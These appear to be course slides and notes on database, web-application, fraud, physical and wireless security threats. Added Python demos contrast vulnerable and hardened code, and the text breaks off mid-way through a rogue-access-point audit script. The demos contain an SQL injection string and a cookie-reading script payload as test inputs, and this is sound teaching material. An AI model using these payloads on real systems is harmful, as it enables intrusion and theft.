– Sometimes employees are granted privileges for accessing the database beyond the requirements of
their job role

– These excessive privileges can be misused by them

– For example: an administrator at a university can be given the excessive privilege of being able to
update or change the grades of students. The administrator can take advantage of this situation and
change the grades of students whom he dislikes


Figure 1-44. Database Security Threats (1 of 6) DS011.0

Notes:
Excessive Privilege Abuse: Sometimes employees who work for an organization are granted privileges for
accessing the database which exceed the requirements of their job role. These excessive privileges can be
misused by them for purposes which can cause damage to the organization. For example, an administrator at
a university can be given the excessive privilege of being able to update or change the grades of students. The
administrator can take advantage of this situation and change the grades of students whom he dislikes. As a
result, the reputation of the university can be at stake.


Database Security Threats (2 of 6)

• Legitimate Privilege Abuse


– The database can be misused by authorized employees for unauthorized purposes

– For example: a worker is not happy with the management of a healthcare firm for some reason and
takes revenge by retrieving and saving some of the patients' records. In this way the data can be
misused

– Storing a huge amount of data on the system can create this threat as well


Figure 1-45. Database Security Threats (2 of 6) DS011.0

Notes:
Legitimate Privilege Abuse: Users who have been given legitimate privileges to use the database can use
them for unauthorized purposes. Let's take an example to understand this threat. A worker in a healthcare
firm has been given the privilege to view the medical records of any patient via a web application. The worker
is not happy with the management of the healthcare firm for some reason and takes revenge by retrieving and
saving some of the patients' records. The web application limits the worker so that numerous records cannot
be viewed concurrently and copies cannot be made electronically, but the worker bypassed these limitations
because the database was also connected to an alternative application such as MS-Excel. Another threat is
that a negligent employee retrieves and stores a huge amount of data on his system. In this case, the data on
the system becomes vulnerable to laptop theft, malware attacks, etc.


Database Security Threats (3 of 6)

• Privilege Elevation
– Attackers can convert the access privileges of an ordinary user into those of an administrator

– They take advantage of vulnerabilities that exist in the database platform software

– These vulnerabilities can be found in the implementation of the protocol, SQL statements, etc.

– For example: at a financial institution, a software developer can take advantage of a vulnerable
function and gain access to the privileges of the database administrator


Figure 1-46. Database Security Threats (3 of 6) DS011.0

Notes:
Privilege Elevation: Attackers can convert the access privileges of an ordinary user into those of an
administrator. They take advantage of vulnerabilities that exist in the database platform software. These
vulnerabilities can be found in the implementation of the protocol, SQL statements, built-in functions and
stored procedures. For example, at a financial institution a software developer can take advantage of a
vulnerable function and gain access to the privileges of the database administrator. Once he has the
administrator's privileges, the developer can turn off the audit mechanisms, transfer funds, create fraudulent
accounts, etc.


Database Security Threats (4 of 6)

• SQL Injection
– Unauthorized statements are injected into the database

– The targeted data channels include the input parameters of web applications

– The entire database can be accessed by SQL injection


Figure 1-47. Database Security Threats (4 of 6) DS011.0

Notes:
SQL Injection: In this type of attack, unauthorized database statements are injected or inserted by
perpetrators into a vulnerable SQL data channel. Typically, the targeted data channels include the input
parameters of web applications and stored procedures. Once injected, the statements are passed to the
database to be executed. Attackers can gain unrestricted access to an entire database by using SQL
injection.
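The injectable data channel described above, shown as an added example (not code from the course): the same account lookup written once by pasting the web-application input into the statement and once with a bound parameter, run against a constructed in-memory SQLite table. With the parameterized form the input can only ever be a value, so the second query returns nothing for the crafted input that makes the first one return every row.

```python
"""Added example (not from the IBM course): the same lookup written with
string concatenation (injectable) and with a bound parameter (safe),
run against a constructed in-memory SQLite database."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for a web application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts ("
                 "id INTEGER PRIMARY KEY, username TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO accounts (username, balance) VALUES (?, ?)",
                     [("alice", 1200), ("bob", 75), ("carol", 9800)])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Builds the SQL by concatenating the input parameter: whatever the
    user submits becomes part of the statement text the database executes."""
    sql = ("SELECT username, balance FROM accounts WHERE username = '"
           + username + "'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, username: str) -> list:
    """Bound parameter: the driver passes the input as data, never as SQL,
    so the statement's structure cannot be changed by the input."""
    sql = "SELECT username, balance FROM accounts WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Constructed input of the kind the slide describes: a quote closes the
# string literal, and the remainder is read as SQL by the vulnerable query.
INJECTED_INPUT = "x' OR '1'='1"

if __name__ == "__main__":
    conn = make_db()
    print("ordinary input, vulnerable:", lookup_vulnerable(conn, "bob"))
    print("ordinary input, safe:      ", lookup_safe(conn, "bob"))
    print("crafted input, vulnerable: ", lookup_vulnerable(conn, INJECTED_INPUT))
    print("crafted input, safe:       ", lookup_safe(conn, INJECTED_INPUT))
```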


Database Security Threats (5 of 6)

• Hopscotch
– Hopscotch is a game often played by cyber criminals

– Hopscotch is a process where a weakness is first identified by the attacker and then used as
leverage for further attacks

– This process is repeated until the attackers reach the back end of the database system

– For example: hackers use worms to find their way around the accounts department of the
organization and then hit the area that processes credit cards


Figure 1-48. Database Security Threats (5 of 6) DS011.0

Notes:
Hopscotch: Hopscotch is a game often played by cyber criminals as an alternative to exploiting a buffer
overflow and gaining total access to the database of an organization in one step. Hopscotch is a process where
the attacker first identifies a weakness which exists in the organization's infrastructure and then uses it as
leverage for further attacks which are more serious in nature. This process is repeated until the attackers
reach the back end of the database system. For example, hackers use worms to find their way around the
accounts department of the organization and then hit the area that processes credit cards. This risk can be
mitigated by segregating systems and using separate administrator accounts.


Database Security Threats (6 of 6)

• Stolen Database Backups


– Insiders as well as external attackers pose a potent threat

– These thefts are carried out for profit, money or simply to take revenge

– Modern organizations face this problem daily

– Encrypting the database backups is the only way to mitigate this type of threat


Figure 1-49. Database Security Threats (6 of 6) DS011.0

Notes:
Stolen database backups: Insiders as well as external attackers are a potent threat when it comes to
stealing the backups created from the database. These thefts are carried out for profit, money or simply to
take revenge. Modern organizations face this problem daily, as insiders also steal archives, including
database backups. Encrypting the database backups is the only way to mitigate this type of threat, which is
faced because of insiders.


Types of Data Security Threats (Contd.)

• Banking Fraud Threats


– A bank customer is a potential target for fraud activities

– Much of a customer's vital information is held by the bank and can be breached

– There are mainly 3 types of bank fraud threats


• Electronic fraud
• Credit/debit card fraud
• Cheque fraud


Figure 1-50. Types of Data Security Threats (Contd.) DS011.0

Notes:
Banking Fraud Threats
A bank customer is a potential target for fraud activities. Much of a customer's vital information is held by
the bank; if breached, it can affect the life of the customer and the reputation of the bank as well. There are
mainly 3 types of bank fraud threats, also illustrated by the diagram given in the slide which follows.


Banking Fraud Threats (1 of 4)


Figure 1-51. Banking Fraud Threats (1 of 4) DS011.0

Notes:
This slide shows the type of bank fraud threats which have been explained in the slides which follow.


Banking Fraud Threats (2 of 4)

• Electronic Fraud
– This fraud is carried out by directing the customer to an authentic-looking but actually fake website and
having them enter their account details

– This process falls into the category of electronic fraud.

– Another method is to send a security message advising the customer to install software that will
check for viruses and also remove them


Figure 1-52. Banking Fraud Threats (2 of 4) DS011.0

Notes:
Electronic fraud threat: Sometimes customers are informed by email that their security details and
passwords need to be updated. They are asked to log in to an authentic-looking but actually fake website and
enter their account details. This process falls into the category of electronic fraud. The main purpose of these
fake websites is to capture the users' logins and the details associated with their bank accounts. Another
method used by cyber criminals is to send a security message advising the customer to install software that
will check for viruses and also remove them. When customers download and use this software, they are
actually tricked into installing a virus which will gain access to their accounts.


Banking Fraud Threats (3 of 4)

• Credit and Debit Card Fraud Threat


– In this type of threat, the debit or credit card of a customer is reproduced

– Skimming is the common term given to this kind of crime.

– Cards can also be intercepted while they are being sent to someone, in other words while they are in
transit.

– Cards can also be misused by a merchant who undertakes duplicate transactions on the customer's
card


Figure 1-53. Banking Fraud Threats (3 of 4) DS011.0

Notes:
Credit and debit card fraud threat: In this type of threat, the debit or credit card of a customer is reproduced
and the balance credited to their account is used to obtain monetary advantage. Every card has a magnetic
strip attached to it which holds a unique code. A credit or debit card is misused when the information on the
magnetic strip is reproduced. Skimming is the common term given to this kind of crime. Another way in which
this kind of fraud occurs is when a customer's card is lost and used by someone who is not authorized to use
it. Cards can also be intercepted while they are being sent to someone, in other words while they are in
transit. Cards can also be misused by a dishonest merchant who undertakes duplicate transactions on the
customer's card.


Banking Fraud Threats (4 of 4)

• Cheque Fraud Threat


– This involves making the unlawful use of cheques

– Following are ways by which cheque fraud can be executed


• A cheque is altered without any authority

• Cheques are first stolen and then altered

• Cheques are duplicated or counterfeited

• False invoices are used to get access to legitimate cheques

• Cheques are deposited into the account of a third party without any authority

• Cheques are deposited for payments in the knowledge that the funds in the account are
insufficient for the transaction


Figure 1-54. Banking Fraud Threats (4 of 4) DS011.0

Notes:
Cheque fraud threat: Cheque fraud refers to a category of criminal acts that involve making unlawful use
of cheques in order to illegally acquire or borrow funds that do not exist within the account balance or the
account-holder's legal ownership. Most methods involve taking advantage of the float (the time between the
negotiation of the cheque and its clearance at the cheque-writer's bank) to draw out these funds. Financial
advantage is gained by using a cheque in this attack. The ways in which cheque fraud can be executed are
listed on this slide.


Types of Data Security Threats (Contd.)

• Web-application Threats
– Malicious users can gain unauthorized access to the web application and exploit a vulnerability

– Many Internet servers are constantly being probed for vulnerabilities

– Thus security measures must be built around the web application of an organization


Figure 1-55. Types of Data Security Threats (Contd.) DS011.0

Notes:
Web-application Threats
If the web application of an organization is accessed by a number of unknown users, then it is certain that
users with malicious intent will try to gain unauthorized access to the applications which are in the network of
the organization. The Internet has many servers which are publicly accessible. These servers are constantly
being probed for vulnerabilities. Thus precautions must be taken and security measures must be built around
the web application of an organization. Below are some threats which are associated with web applications:


Web-application Threats (1 of 5)

• Spoofing
– In this attack, the identity of a process or a user is impersonated

– In a spoofing attack, the credentials of other users are entered.

– If stringent authentication is used, then spoofing attacks can be mitigated

– It must be made sure that requests which come from a non-public domain use their own identity


Figure 1-56. Web-application Threats (1 of 5) DS011.0

Notes:
Spoofing: Impersonating a user or a process in a way that is not authorized is spoofing. For example, an
attacker may type in another user's credentials. An attacker might also change the contents of a cookie to
pretend to be a different user, or to make the cookie appear to have been generated by a different server.
Spoofing attacks can be mitigated by using stringent authentication: whenever someone requests access to
non-public information, make sure they are who they say they are. Keeping credential information safe also
helps to prevent spoofing attacks.
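The cookie manipulation described above is defeated by authenticating the cookie's contents, so that the server can tell a cookie it issued from one the client has edited. The Python below is an added example, not code from the course: it signs a session cookie with an HMAC over a server-side secret and rejects any cookie whose payload has been altered. The secret value and the user identities are placeholders for the illustration.

```python
import base64
import hashlib
import hmac

# Assumed server-side secret for the illustration; a real deployment would
# load it from a secrets store and rotate it, never embed it in source.
SERVER_SECRET = b"example-secret-rotate-me"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode("ascii").rstrip("=")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_session_cookie(user_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Return '<payload>.<tag>' with tag = HMAC-SHA256(secret, payload).

    The payload is readable by the client, but it cannot be changed without
    invalidating the tag, because only the server knows the secret.
    """
    payload = _b64(user_id.encode("utf-8"))
    tag = hmac.new(secret, payload.encode("ascii"), hashlib.sha256).digest()
    return f"{payload}.{_b64(tag)}"


def verify_session_cookie(cookie: str, secret: bytes = SERVER_SECRET):
    """Return the user id if the cookie is authentic, otherwise None.

    hmac.compare_digest is a constant-time comparison, so an attacker cannot
    recover the correct tag byte by byte from response timing.
    """
    try:
        payload, tag = cookie.split(".", 1)
        expected = hmac.new(secret, payload.encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(_unb64(tag), expected):
            return None
        return _unb64(payload).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def demo() -> dict:
    """Constructed scenario: the attacker keeps a genuine tag but swaps the
    payload so the cookie now claims to belong to 'admin'."""
    genuine = issue_session_cookie("alice")
    forged = _b64(b"admin") + "." + genuine.split(".", 1)[1]
    return {
        "genuine_user": verify_session_cookie(genuine),
        "forged_user": verify_session_cookie(forged),
    }


if __name__ == "__main__":
    print(demo())
```

A signed cookie stops the client from changing the payload, but it does not stop a stolen cookie from being replayed; an expiry time inside the signed payload and the Secure and HttpOnly cookie attributes address that, which is what "keeping credential information safe" means in practice.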


Web-application Threats (2 of 5)

• Tampering
– Changing or deleting a resource without the rights to do so

– For example: a web page is defaced by an attacker who gets into the organization's site and changes
existing files

– A script exploit is an indirect way to tamper: the attacker gets code to execute by masking it as user
input from a page

– The script can also be embedded in a link that is sent to the user


Figure 1-57. Web-application Threats (2 of 5) DS011.0

Notes:
Tampering: Changing or deleting a resource without the rights to do so is known as tampering. For example, a
web page is defaced by an attacker who gets into the organization's site and changes existing files. A script
exploit is an indirect way to tamper: the attacker gets code (script) to execute by masking it as user input
from a page, or embeds the script in a link and sends that link to the user. A primary defense against
tampering is to use Windows security to lock down directories, files and other Windows resources. The
application should also run with the minimum privileges it requires. Information that comes from an unknown
user or data source must never be trusted; this helps to guard a system against script exploits.
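The script exploit described above works because untrusted input is written into the page as markup. The Python below is an added example, not course code, showing the vulnerable rendering beside the hardened one: the attack link, the host name and the greeting page are constructed for the illustration, and the check at the end only asks whether a real script tag survives in the rendered output.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed attack link: the "name" parameter carries script, not a name.
# The host name is a placeholder.
MALICIOUS_LINK = (
    "https://shop.example/greet?name="
    "%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
)


def name_from_link(link: str) -> str:
    """Extract the 'name' query parameter the way a web framework would."""
    return parse_qs(urlparse(link).query).get("name", [""])[0]


def render_greeting_unsafe(name: str) -> str:
    """Vulnerable: user-supplied text is pasted straight into the markup, so
    a <script> in 'name' becomes part of the page and runs in the browser."""
    return f"<h1>Welcome, {name}!</h1>"


def render_greeting_safe(name: str) -> str:
    """Hardened: every user-controlled value is HTML-escaped on output, so
    '<' becomes '&lt;' and the browser shows text instead of running script."""
    return f"<h1>Welcome, {html.escape(name, quote=True)}!</h1>"


def contains_active_script(page: str) -> bool:
    """Crude check for the demo: is there still a real <script> tag in the
    rendered markup?"""
    return "<script" in page.lower()


def demo() -> dict:
    name = name_from_link(MALICIOUS_LINK)
    return {
        "unsafe_executes": contains_active_script(render_greeting_unsafe(name)),
        "safe_executes": contains_active_script(render_greeting_safe(name)),
        "safe_output": render_greeting_safe(name),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Escaping is context-specific: html.escape is right for element text and attribute values, while a value placed inside a script block or a URL needs a different encoder. The rule from the text, never trusting input from an unknown user, is what makes the escaping mandatory rather than optional.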


Web-application Threats (3 of 5)

• Repudiation
– A transaction is carried out so that there is no proof afterwards of the principal behind it; in a web
application the attacker impersonates another user's credentials

– Stringent authentication guards computing systems and web applications against this type of attack

– The logging features of Windows should be used to keep an audit trail of activity on the server


Figure 1-58. Web-application Threats (3 of 5) DS011.0

Notes:
Repudiation: A repudiation attack carries out a transaction in such a way that there is no proof after the fact of
the principal behind it. In a web application this usually means that the attacker impersonates another user's
credentials. Stringent authentication guards computing systems and web applications against this type of
attack. In addition, the logging features of Windows should be used to keep an audit trail of all activity on the
server, which makes such attacks much harder to carry out undetected.
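An audit trail only defeats repudiation if the records themselves cannot be quietly rewritten afterwards. As an added example (not from the course), the Python below keeps an append-only log in which every record's hash also covers the previous record's hash, so editing or deleting an earlier entry breaks the chain and is detected on verification. The principals, actions and timestamps are constructed for the illustration.

```python
import hashlib
import json
from datetime import datetime, timezone


class AuditTrail:
    """Append-only audit log in which each record's hash also covers the
    previous record's hash. Editing or deleting an earlier entry therefore
    breaks every later link, so the log itself proves who did what."""

    GENESIS = "0" * 64

    def __init__(self):
        self.records = []

    def append(self, principal: str, action: str, target: str, when: str = None) -> dict:
        prev = self.records[-1]["hash"] if self.records else self.GENESIS
        record = {
            "seq": len(self.records),
            "time": when or datetime.now(timezone.utc).isoformat(),
            "principal": principal,
            "action": action,
            "target": target,
            "prev": prev,
        }
        record["hash"] = self._digest(record)
        self.records.append(record)
        return record

    @staticmethod
    def _digest(record: dict) -> str:
        body = {k: v for k, v in record.items() if k != "hash"}
        return hashlib.sha256(json.dumps(body, sort_keys=True).encode("utf-8")).hexdigest()

    def verify(self) -> tuple:
        """Return (True, -1) if the chain is intact, otherwise (False, seq)
        where seq is the first record that fails."""
        prev = self.GENESIS
        for i, rec in enumerate(self.records):
            if rec["seq"] != i or rec["prev"] != prev or rec["hash"] != self._digest(rec):
                return False, i
            prev = rec["hash"]
        return True, -1


def demo() -> dict:
    """Constructed scenario: three actions by 'alice', after which she tries
    to repudiate the transfer by rewriting the record to name 'bob'."""
    log = AuditTrail()
    log.append("alice", "LOGIN", "/", when="2015-03-01T09:00:00+00:00")
    log.append("alice", "TRANSFER", "acct:4711", when="2015-03-01T09:02:10+00:00")
    log.append("alice", "LOGOUT", "/", when="2015-03-01T09:05:00+00:00")
    before = log.verify()
    log.records[1]["principal"] = "bob"
    after = log.verify()
    return {"before": before, "after": after}


if __name__ == "__main__":
    print(demo())
```

Verification only proves that the log has not changed since its hashes were computed; an attacker who owns the file could rewrite the whole chain. In practice the latest hash is therefore periodically signed or shipped to a separate log server, which is the role a Windows audit trail plays once it is forwarded off the host.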


Web-application Threats (4 of 5)

• Information Disclosure
– Stealing or revealing data that is supposed to be private

– For example: stealing a system password, or disclosing information that gives access to files or to a
server


Figure 1-59. Web-application Threats (4 of 5) DS011.0

Notes:
Information Disclosure: Information disclosure attacks are designed to acquire system-specific information
about a web site, such as the software distribution, version numbers and patch levels, or the location of
backup files and temporary files. In most cases, divulging this information is not required to fulfil the needs of
the user. Most web sites reveal some data, but it is best to limit the amount of data whenever possible. The
more an attacker learns about the web site, the easier the system becomes to compromise.
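As an added example (not from the course), the Python below checks a single HTTP response for exactly the disclosures listed above: version numbers in server headers, stack traces or error detail in the body, absolute file-system paths, and references to backup or temporary files. The response it inspects is constructed for the illustration; the server, paths and file names in it are hypothetical.

```python
import re

# Constructed HTTP response from a hypothetical server, showing the kinds of
# disclosure the text describes: version headers, an error page that leaks
# file-system paths, and a reference to a backup file.
SAMPLE_RESPONSE = """\
HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.15 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html

<html><body>
<b>Fatal error</b>: Uncaught exception in /var/www/html/inc/db.php on line 42
Stack trace: #0 /var/www/html/index.php(17): connect_db()
See also /var/www/html/config.php.bak
</body></html>
"""

VERSION_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator")
VERSION_RE = re.compile(r"\d+\.\d+")
PATH_RE = re.compile(r"(?:[A-Za-z]:\\|/)(?:[\w.-]+[\\/])+[\w.-]+")
BACKUP_RE = re.compile(r"\S+\.(?:bak|old|orig|swp|tmp)\b", re.IGNORECASE)
STACK_RE = re.compile(r"stack trace|traceback|uncaught exception|on line \d+", re.IGNORECASE)


def parse_response(raw: str):
    """Split a raw HTTP response into a lower-cased header dict and the body."""
    head, _, body = raw.partition("\n\n")
    headers = {}
    for line in head.splitlines()[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def find_disclosures(raw: str) -> list:
    """Return (category, detail) findings for one response."""
    headers, body = parse_response(raw)
    findings = []
    for name in VERSION_HEADERS:
        if name in headers and VERSION_RE.search(headers[name]):
            findings.append(("version_header", f"{name}: {headers[name]}"))
    if STACK_RE.search(body):
        findings.append(("error_detail", "stack trace or error detail in body"))
    for path in sorted(set(PATH_RE.findall(body))):
        findings.append(("filesystem_path", path))
    for name in sorted(set(BACKUP_RE.findall(body))):
        findings.append(("backup_file", name))
    return findings


if __name__ == "__main__":
    for category, detail in find_disclosures(SAMPLE_RESPONSE):
        print(f"{category:16} {detail}")
```

The fixes are the mirror image of the findings: strip version tokens from the Server and X-Powered-By headers, return a generic error page and keep the stack trace in the server log, and never leave backup or temporary files inside the web root.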


Web-application Threats (5 of 5)

• Fuzzing
– Feeding unexpected values into an application so that it crashes is fuzzing

– When that happens, the user may be left with elevated privileges or with access to values they should
not have

– The values can be unexpected, invalid or random


Figure 1-60. Web-application Threats (5 of 5) DS011.0

Notes:
Fuzzing: Most applications are written to accept a particular type of input: string values, numeric values, and
so on. Sometimes it is possible to enter unexpected values and cause the application to crash. When that
happens, it may be possible for the user to be left with elevated privileges or with access to values they should
not have. The technique of feeding unexpected values and actions into an application's input in order to crash
it is known as fuzzing. Those values can be unexpected, invalid or random, and a common method is to flood
the input with a stream of random bytes. The best way to prevent fuzzing from becoming an exploit on your
systems is to fuzz test the applications yourself, in order to find and fix the problems first.
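An added example, not from the course, of what fuzz testing your own code looks like in practice. The record format, both parsers and the mutation strategy are assumptions made for the illustration: the first parser trusts the length field the way many real parsers do; the fuzzer mutates a valid seed message (overwriting bytes, truncating, appending junk) and records every input that makes the parser fail with anything other than its own deliberate rejection; the second parser shows the fix, which is to validate every length before it is used so that bad input is rejected cleanly instead of crashing.

```python
import random
import struct

# Toy wire format used for the demonstration (an assumption, not a real
# protocol): 1-byte type, 2-byte big-endian length, then 'length' bytes of
# payload whose first 4 bytes are a record ID.
SEED_MESSAGE = b"\x01" + struct.pack(">H", 9) + struct.pack(">I", 0xDEADBEEF) + b"hello"


def parse_record_buggy(data: bytes) -> dict:
    """Trusts the declared length and the buffer size, like many real parsers."""
    rtype = data[0]
    (length,) = struct.unpack(">H", data[1:3])
    payload = data[3:3 + length]
    (ident,) = struct.unpack(">I", payload[:4])     # fails if payload < 4 bytes
    return {"type": rtype, "id": ident, "body": payload[4:]}


def parse_record_fixed(data: bytes) -> dict:
    """Same format, but every length is checked before it is used, and bad
    input is rejected with a ValueError instead of an unexpected crash."""
    if len(data) < 3:
        raise ValueError("truncated header")
    rtype = data[0]
    (length,) = struct.unpack(">H", data[1:3])
    if length < 4 or 3 + length > len(data):
        raise ValueError("declared length inconsistent with buffer")
    payload = data[3:3 + length]
    (ident,) = struct.unpack(">I", payload[:4])
    return {"type": rtype, "id": ident, "body": payload[4:]}


def mutate(seed_msg: bytes, rng: random.Random) -> bytes:
    """Three classic mutations: overwrite a byte, truncate, or append junk."""
    buf = bytearray(seed_msg)
    op = rng.randrange(3)
    if op == 0:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == 1:
        buf = buf[: rng.randrange(len(buf) + 1)]
    else:
        buf += bytes(rng.randrange(256) for _ in range(rng.randrange(1, 8)))
    return bytes(buf)


def fuzz(parser, seed_msg: bytes = SEED_MESSAGE, iterations: int = 2000, seed: int = 1) -> list:
    """Feed mutated inputs to the parser and collect the ones that raise
    anything other than the parser's own ValueError rejection."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        msg = mutate(seed_msg, rng)
        try:
            parser(msg)
        except ValueError:
            continue                    # clean rejection, not a crash
        except Exception as exc:        # IndexError, struct.error, ...
            crashes.append((type(exc).__name__, msg))
    return crashes


if __name__ == "__main__":
    print("buggy parser crashes:", len(fuzz(parse_record_buggy)))
    print("fixed parser crashes:", len(fuzz(parse_record_fixed)))
```

Against the buggy parser the harness collects IndexError and struct.error failures within a few thousand iterations; against the fixed parser it collects none. The loop works unchanged against any function that takes bytes, which is the point: fuzz your own parsers before an attacker does.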


Types of Data Security Threats (Contd.)

• Physical Security Threats


– There are numerous physical threats that can breach an organization's physical security

– Physical security deals with intruders, physical destruction, theft, vandalism, environmental issues,
etc.

– Security professionals look at network security and physical security differently

– To secure the network they concentrate on the modem, the wireless access point and similar entry
points


Figure 1-61. Types of Data Security Threats (Contd.) DS011.0

Notes:
Physical security Threats
There are numerous physical threats that can breach physical security and thereby expose an organization's
confidential data. Computer or network security differs from physical security because the threats differ.
Physical security deals with intruders, physical destruction, theft, vandalism, environmental issues, etc.
Security professionals look at network security and physical security differently. To secure the network they
concentrate on the modem, the wireless access point and the other points where someone could enter in an
unauthorized manner; when looking at physical security, they are more concerned with the wide range of
damage people can cause by physically entering an environment. The various threats an organization faces
are listed below:


Physical Security Threats

• Natural Disaster

• Supply System Threats

• Man-Made Threat

• Political Threat


Figure 1-62. Physical Security Threats DS011.0

Notes:
Natural disasters: Earthquakes, volcanic eruptions, tornadoes, floods, storms, extreme temperatures, fire,
etc.
Supply system threats: Outages in power distribution, interruptions in communications and stoppages in the
supply of utilities such as steam, air, gas, etc.
Man-made threats: Explosions, unauthorized access (both external and internal), damage by disgruntled
employees, vandalism, accidents due to employee error, fraud, theft, etc.
Political threats: Riots, strikes, civil disobedience, bombings, terrorist attacks, etc.
Insider threat: Insiders, who can access the network legitimately, pose a threat to information because they
can easily misfile, delete or alter it. Insider threats, whether due to wrongful activity or mere carelessness, can
therefore cost an organization severely.
The threats mentioned above can exploit any vulnerability present in an organization's information system,
with a potentially catastrophic effect not only on productivity but also on the reputation of the organization.


Types of Data Security Threats (Contd.)

• Hacking & Social Engineering Threat


– Hacking Threat
• Malware and other data security threats are created and used by hackers

• The process by which hackers steal, change or destroy data is known as hacking

• Computer hacking affects organizations in a variety of ways

– Social Engineering Threat


• Confidential and important information is extracted from employees

• Individual employees are manipulated and their trust is taken advantage of


Figure 1-63. Types of Data Security Threats (Contd.) DS011.0

Notes:
Hacking and Social Engineering Threat
Malware and other data security threats are created and used by hackers, who exploit users for personal profit
by acquiring confidential information or stealing data after breaking into users' systems. This process of
stealing, changing or destroying data is known as hacking. Computer hacking pervades global society in the
digital age. Breaking into a secure computer network serves many purposes, from corporate espionage to
outright theft and political insubordination. Computer hacking affects organizations in a variety of ways, some
universal, others specific to the reason for the hacking and the business in question. The direction of the
hacking, whether the organization hacks or gets hacked, also has an effect. Social engineering is another
element of hacking.
Social engineering is the technique of extracting confidential and important information from users. Although
the information sought can vary, most commonly the "social engineers" aim to acquire passwords or company
information, or to install malware without the user's knowledge, which gives them access to and control of the
user's computer system. These criminals play on people's natural inclination to trust: they pose as
troubleshooters, or offer some other assistance, and so gain the user's confidence. Users who are in need, or
who lack proper awareness, then fall blindly into these well-planned traps.


Types of Data Security Threats

• Wireless Network Security Threat


– Wireless LANs increase the risk of wireless network attacks in almost every environment

– A wireless network does not require any real physical access, so it can be exploited and manipulated
more easily than a wired one

– Lack of wireless network knowledge among individuals is the main reason they are vulnerable to
these attacks


Figure 1-64. Types of Data Security Threats DS011.0

Notes:
Wireless network security threats
Wireless LANs increase the risk of wireless network attacks in almost every environment. The main reason
for this is the lack of wireless network knowledge among individuals, which makes them vulnerable to
malicious attacks. In a wired network, the cable connecting servers and network devices makes exploitation
difficult without some kind of physical access. A wireless network, however, requires no real physical access
and so can be exploited and manipulated more easily. Some fundamental threats that exist in wireless LANs
are illustrated and explained in the slides that follow.


Wireless Network Security Threat (1 of 5)


Figure 1-65. Wireless Network Security Threat (1 of 5) DS011.0

Notes:
The various types of wireless security threats are illustrated in this slide with the help of a diagram. These
threats are explained in the slides that follow.


Wireless Network Security Threats (2 of 5)

• Rogue Access Point/Ad-Hoc Networks


– Attackers can trick users' legitimate devices into connecting to a rog
ue access point instead of the legitimate one

– The rogue access point is set up by attackers, within range, when they target an existing wireless LAN

– Physical access to a network port lets the attacker keep the rogue access point useful for much
longer than a short-lived trick


Figure 1-66. Wireless Network Security Threats (2 of 5) DS011.0

Notes:
Rogue Access Points/Ad-Hoc Networks: Attackers can trick users' legitimate devices into connecting to an
access point under their control (a rogue access point) instead of the legitimate access points. The attackers
set up this rogue access point, within range of the wireless LAN, when they target an existing wireless LAN.
On its own, however, such an access point is effective only for a short time: a user who connects to it cannot
perform any of their usual duties, so they soon disconnect. Physical access solves this problem for the
attacker. If the attacker can reach a physical port on the organization's network, they can connect the rogue
access point to that port, trick other systems and devices into connecting through it, and capture data for a
much longer period while users continue to work normally. If the wireless LAN provides Internet access, it is
even easier for a rogue access point to fool a user by offering Internet access, and the exposure increases
many times over. Unauthorized ad-hoc (temporary, device-to-device) networks and unauthorized access
points use a similar technique; such networks lack proper security measures and are therefore vulnerable to
attack.


Wireless Network Security Threats (3 of 5)

• Denial of Service
– This attack blocks or severely limits access to services

– A target is chosen and traffic is flooded its way

– Radio interference on the 2.4 GHz band is another way of denying service, apart from flooding with
traffic

– This technique works if the LAN operates on the 2.4 GHz band


Figure 1-67. Wireless Network Security Threats (3 of 5) DS011.0

Notes:
Denial of Service: This attack blocks or severely limits access to services. Access is blocked by flooding the
system with traffic: a target is chosen and traffic is directed its way. Wireless networks are also vulnerable to
interference with the radio signal on the 2.4 GHz band, which is another way of denying service apart from
flooding with traffic. A simple microwave oven, or a competing access point on the same channel, can be
used to cause the interference. This technique works if the LAN operates on the 2.4 GHz band. A DoS attack
can also be combined with a rogue access point to cause service interruption: the rogue access point is set
up on a channel that the legitimate access point is not using, and the legitimate access point's channel is then
attacked with denial of service so that clients fall back to the rogue one.


Wireless Network Security Threats (4 of 5)

• Configuration Problems
– Consumer/SOHO grade access points are shipped with no security configuration, which leads to
configuration problems

– These devices can be set up by any amateur user, so they are often deployed without any access
control

– Weak security deployments, weak passphrases and default SSIDs are other issues that increase
risk


Figure 1-68. Wireless Network Security Threats (4 of 5) DS011.0

Notes:
Configuration Problems: In most cases, consumer/SOHO grade access points are shipped with no security
configuration, which leads to configuration problems. Because setting up these devices is not a complex task,
any amateur user can get one working, but that also leaves the device open to outside use without any extra
effort on the attacker's part. Weak security deployments, weak passphrases and default SSIDs are other
issues that increase risk.
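The rogue access points described two slides earlier and the configuration problems described here can both be caught from an ordinary site survey, provided the network team keeps a list of its own access points. The Python below is an added example, not course material: it audits a constructed scan (the SSIDs, BSSIDs, the authorized list and the default-SSID list are all assumptions) for access points that advertise the corporate SSID from an unknown BSSID (the evil twin), for ad-hoc networks, for factory-default SSIDs and for open or WEP networks.

```python
# Constructed scan results, in the shape a site-survey tool reports them.
# The authorized BSSID list and the default-SSID list are assumptions that
# stand in for what a network team would maintain.
AUTHORIZED_APS = {
    "CorpWiFi": {"00:11:22:33:44:01", "00:11:22:33:44:02"},
}
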